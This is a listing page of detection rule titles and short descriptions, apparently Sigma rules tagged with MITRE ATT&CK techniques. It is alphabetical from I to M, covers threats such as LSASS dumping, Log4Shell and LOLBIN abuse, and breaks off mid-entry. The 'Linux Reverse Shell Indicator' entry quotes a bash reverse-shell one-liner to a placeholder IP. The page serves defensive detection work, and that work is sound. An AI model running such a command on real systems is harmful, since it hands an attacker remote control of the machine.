    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Rundll32 in Scripts


    Read More
  • Invoke-Obfuscation Via Use Rundll32 - System

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Obfuscated Powershell via use Rundll32 in Scripts


    Read More
  • ISO File Created Within Temp Folders

    calendar Aug 12, 2024 · attack.initial-access attack.t1566.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.


    Read More
  • ISO Image Mounted

    calendar Aug 12, 2024 · attack.initial-access attack.t1566.001  ·
    Share on: twitter facebook linkedin copy

    Detects the mount of an ISO image on an endpoint


    Read More
  • ISO or Image Mount Indicator in Recent Files

    calendar Aug 12, 2024 · attack.initial-access attack.t1566.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.


    Read More
  • JAMF MDM Execution

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.


    Read More
  • JAMF MDM Potential Suspicious Child Process

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent.


    Read More
  • Java Payload Strings

    calendar Aug 12, 2024 · cve.2022-26134 cve.2021-26084 attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects possible Java payloads in web access logs


    Read More
  • Java Running with Remote Debugging

    calendar Aug 12, 2024 · attack.t1203 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects a JAVA process running with remote debugging allowing more than just localhost to connect


    Read More
  • JexBoss Command Sequence

    calendar Aug 12, 2024 · attack.execution attack.t1059.004  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious command sequence that JexBoss


    Read More
  • JNDIExploit Pattern

    calendar Aug 12, 2024 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt using the JNDI-Exploit-Kit


    Read More
  • JScript Compiler Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1127  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the "jsc.exe" (JScript Compiler). Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.


    Read More
  • Juniper BGP Missing MD5

    calendar Aug 12, 2024 · attack.initial-access attack.persistence attack.privilege-escalation attack.defense-evasion attack.credential-access attack.collection attack.t1078 attack.t1110 attack.t1557  ·
    Share on: twitter facebook linkedin copy

    Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.


    Read More
  • JXA In-memory Execution Via OSAScript

    calendar Aug 12, 2024 · attack.t1059.002 attack.t1059.007 attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects possible malicious execution of JXA in-memory via OSAScript


    Read More
  • Kavremover Dropped Binary LOLBIN Usage

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1127  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.


    Read More
  • KDC RC4-HMAC Downgrade CVE-2022-37966

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation


    Read More
  • Kerberos Manipulation

    calendar Aug 12, 2024 · attack.credential-access attack.t1212  ·
    Share on: twitter facebook linkedin copy

    Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.


    Read More
  • Kerberos Network Traffic RC4 Ticket Encryption

    calendar Aug 12, 2024 · attack.credential-access attack.t1558.003  ·
    Share on: twitter facebook linkedin copy

    Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting


    Read More
  • KrbRelayUp Service Installation

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1543  ·
    Share on: twitter facebook linkedin copy

    Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)


    Read More
  • Kubernetes Admission Controller Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007  ·
    Share on: twitter facebook linkedin copy

    Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.


    Read More
  • Kubernetes CronJob/Job Modification

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.


    Read More
  • Kubernetes Rolebinding Modification

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects when a Kubernetes Rolebinding is created or modified.


    Read More
  • Kubernetes Secrets Modified or Deleted

    calendar Aug 12, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects when Kubernetes Secrets are Modified or Deleted.


    Read More
  • Launch-VsDevShell.PS1 Proxy Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1216.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.


    Read More
  • Lazarus Group Activity

    calendar Aug 12, 2024 · attack.g0032 attack.execution attack.t1059 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects different process execution behaviors as described in various threat reports on Lazarus group activity


    Read More
  • Lazarus System Binary Masquerading

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1036.005 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location


    Read More
  • Legitimate Application Dropped Archive

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects programs on a Windows system that should not write an archive to disk


    Read More
  • Legitimate Application Dropped Executable

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects programs on a Windows system that should not write executables to disk


    Read More
  • Legitimate Application Dropped Script

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects programs on a Windows system that should not write scripts to disk


    Read More
  • Leviathan Registry Key Activity

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects registry key used by Leviathan APT in Malaysian focused campaign


    Read More
  • Linux Base64 Encoded Pipe to Shell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1140  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious process command line that uses base64 encoded input for execution with a shell


    Read More
  • Linux Base64 Encoded Shebang In CLI

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1140  ·
    Share on: twitter facebook linkedin copy

    Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded


    Read More
  • Linux Capabilities Discovery

    calendar Aug 12, 2024 · attack.collection attack.privilege-escalation attack.t1123 attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.


    Read More
  • Linux Command History Tampering

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.003  ·
    Share on: twitter facebook linkedin copy

    Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".


    Read More
  • Linux Crypto Mining Indicators

    calendar Aug 12, 2024 · attack.impact attack.t1496  ·
    Share on: twitter facebook linkedin copy

    Detects command line parameters or strings often used by crypto miners


    Read More
  • Linux Crypto Mining Pool Connections

    calendar Aug 12, 2024 · attack.impact attack.t1496  ·
    Share on: twitter facebook linkedin copy

    Detects process connections to a Monero crypto mining pool


    Read More
  • Linux Doas Conf File Creation

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of doas.conf file in linux host platform.


    Read More
  • Linux Doas Tool Execution

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.


    Read More
  • Linux Keylogging with Pam.d

    calendar Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1056.001  ·
    Share on: twitter facebook linkedin copy

    Detect attempt to enable auditing of TTY input


    Read More
  • Linux Network Service Scanning - Auditd

    calendar Aug 12, 2024 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of local or remote network services.


    Read More
  • Linux Package Uninstall

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070  ·
    Share on: twitter facebook linkedin copy

    Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".


    Read More
  • Linux Recon Indicators

    calendar Aug 12, 2024 · attack.reconnaissance attack.t1592.004 attack.credential-access attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Detects events with patterns found in commands used for reconnaissance on linux systems


    Read More
  • Linux Remote System Discovery

    calendar Aug 12, 2024 · attack.discovery attack.t1018  ·
    Share on: twitter facebook linkedin copy

    Detects the enumeration of other remote systems.


    Read More
  • Linux Reverse Shell Indicator

    calendar Aug 12, 2024 · attack.execution attack.t1059.004  ·
    Share on: twitter facebook linkedin copy

    Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')


    Read More
  • Linux Shell Pipe to Shell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1140  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell


    Read More
  • Linux Webshell Indicators

    calendar Aug 12, 2024 · attack.persistence attack.t1505.003  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious sub processes of web server processes


    Read More
  • Live Memory Dump Using Powershell

    calendar Aug 12, 2024 · attack.t1003  ·
    Share on: twitter facebook linkedin copy

    Detects usage of a PowerShell command to dump the live memory of a Windows machine


    Read More
  • LiveKD Driver Creation

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of the LiveKD driver, which is used for live kernel debugging


    Read More
  • LiveKD Driver Creation By Uncommon Process

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of the LiveKD driver by a process image other than "livekd.exe".


    Read More
  • LiveKD Kernel Memory Dump File Created

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.


    Read More
  • LoadBalancer Security Group Modification

    calendar Aug 12, 2024 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.


    Read More
  • Loading Diagcab Package From Remote Path

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability


    Read More
  • Loading of Kernel Module via Insmod

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1547.006  ·
    Share on: twitter facebook linkedin copy

    Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.


    Read More
  • Local Accounts Discovery

    calendar Aug 12, 2024 · attack.discovery attack.t1033 attack.t1087.001  ·
    Share on: twitter facebook linkedin copy

    Local accounts, System Owner/User discovery using operating systems utilities


    Read More
  • Local File Read Using Curl.EXE

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.


    Read More
  • Local Groups Discovery - Linux

    calendar Aug 12, 2024 · attack.discovery attack.t1069.001  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings


    Read More
  • Local Groups Discovery - MacOs

    calendar Aug 12, 2024 · attack.discovery attack.t1069.001  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of local system groups


    Read More
  • Local Groups Reconnaissance Via Wmic.EXE

    calendar Aug 12, 2024 · attack.discovery attack.t1069.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.


    Read More
  • Local Network Connection Initiated By Script Interpreter

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.


    Read More
  • Local Privilege Escalation Indicator TabTip

    calendar Aug 12, 2024 · attack.execution attack.t1557.001  ·
    Share on: twitter facebook linkedin copy

    Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode


    Read More
  • Local System Accounts Discovery - MacOs

    calendar Aug 12, 2024 · attack.discovery attack.t1087.001  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of local systeam accounts on MacOS


    Read More
  • Local User Creation

    calendar Aug 12, 2024 · attack.persistence attack.t1136.001  ·
    Share on: twitter facebook linkedin copy

    Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.


    Read More
  • Locked Workstation

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects locked workstation session events that occur automatically after a standard period of inactivity.


    Read More
  • LockerGoga Ransomware Activity

    calendar Aug 12, 2024 · attack.impact attack.t1486 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects LockerGoga ransomware activity via specific command line.


    Read More
  • Log4j RCE CVE-2021-44228 Generic

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)


    Read More
  • Log4j RCE CVE-2021-44228 in Fields

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-44228 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)


    Read More
  • Logged-On User Password Change Via Ksetup.EXE

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects password change for the logged-on user's via "ksetup.exe"


    Read More
  • Logging Configuration Changes on Linux Host

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.006  ·
    Share on: twitter facebook linkedin copy

    Detect changes of syslog daemons configuration files


    Read More
  • Login to Disabled Account

    calendar Aug 12, 2024 · attack.initial-access attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detect failed attempts to sign in to disabled accounts.


    Read More
  • Logon from a Risky IP Address

    calendar Aug 12, 2024 · attack.initial-access attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.


    Read More
  • LOL-Binary Copied From System Directory

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.


    Read More
  • LOLBAS Data Exfiltration by DataSvcUtil.exe

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567  ·
    Share on: twitter facebook linkedin copy

    Detects when a user performs data exfiltration by using DataSvcUtil.exe


    Read More
  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json


    Read More
  • LOLBIN Execution From Abnormal Drive

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.


    Read More
  • Lolbin Runexehelper Use As Proxy

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs


    Read More
  • Lolbin Unregmp2.exe Use As Proxy

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"


    Read More
  • LSA PPL Protection Disabled Via Reg.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.010  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process


    Read More
  • LSASS Access Detected via Attack Surface Reduction

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects Access to LSASS Process


    Read More
  • LSASS Access From Non System Account

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects potential mimikatz-like tools accessing LSASS from non system account


    Read More
  • LSASS Access From Potentially White-Listed Processes

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002  ·
    Share on: twitter facebook linkedin copy

    Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference


    Read More
  • LSASS Dump Keyword In CommandLine

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.


    Read More
  • Lsass Full Dump Request Via DumpType Registry Settings

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.


    Read More
  • LSASS Memory Access by Tool With Dump Keyword In Name

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002  ·
    Share on: twitter facebook linkedin copy

    Detects LSASS process access requests from a source process with the "dump" keyword in its image name.


    Read More
  • Lsass Memory Dump via Comsvcs DLL

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.


    Read More
  • LSASS Process Dump Artefact In CrashDumps Folder

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.


    Read More
  • MacOS Emond Launch Daemon

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1546.014  ·
    Share on: twitter facebook linkedin copy

    Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.


    Read More
  • MacOS Network Service Scanning

    calendar Aug 12, 2024 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of local or remote network services.


    Read More
  • Macos Remote System Discovery

    calendar Aug 12, 2024 · attack.discovery attack.t1018  ·
    Share on: twitter facebook linkedin copy

    Detects the enumeration of other remote systems.


    Read More
  • MacOS Scripting Interpreter AppleScript

    calendar Aug 12, 2024 · attack.execution attack.t1059.002  ·
    Share on: twitter facebook linkedin copy

    Detects execution of AppleScript of the macOS scripting language AppleScript.


    Read More
  • Macro Enabled In A Potentially Suspicious Document

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects registry changes to Office trust records where the path is located in a potentially suspicious location


    Read More
  • Mailbox Export to Exchange Webserver

    calendar Aug 12, 2024 · attack.persistence attack.t1505.003  ·
    Share on: twitter facebook linkedin copy

    Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it


    Read More
  • Malicious Base64 Encoded PowerShell Keywords in Command Lines

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects base64 encoded strings used in hidden malicious PowerShell command lines


    Read More
  • Malicious IP Address Sign-In Failure Rate

    calendar Aug 12, 2024 · attack.t1090 attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Indicates sign-in from a malicious IP address based on high failure rates.


    Read More
  • Malicious IP Address Sign-In Suspicious

    calendar Aug 12, 2024 · attack.t1090 attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.


    Read More
  • Malicious Named Pipe Created

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a named pipe seen used by known APTs or malware.


    Read More
  • Malicious Nishang PowerShell Commandlets

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Commandlet names and arguments from the Nishang exploitation framework


    Read More
  • Malicious PE Execution by Microsoft Visual Studio Debugger

    calendar Aug 12, 2024 · attack.t1218 attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.


    Read More
  • Malicious PowerShell Commandlets - ScriptBlock

    calendar Aug 12, 2024 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Commandlet names from well-known PowerShell exploitation frameworks


    Read More
  • Malicious PowerShell Keywords

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects keywords from well-known PowerShell exploitation frameworks


    Read More
  • Malicious ShellIntel PowerShell Commandlets

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects Commandlet names from ShellIntel exploitation scripts.


    Read More
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure

    calendar Aug 12, 2024 · attack.privilege-escalation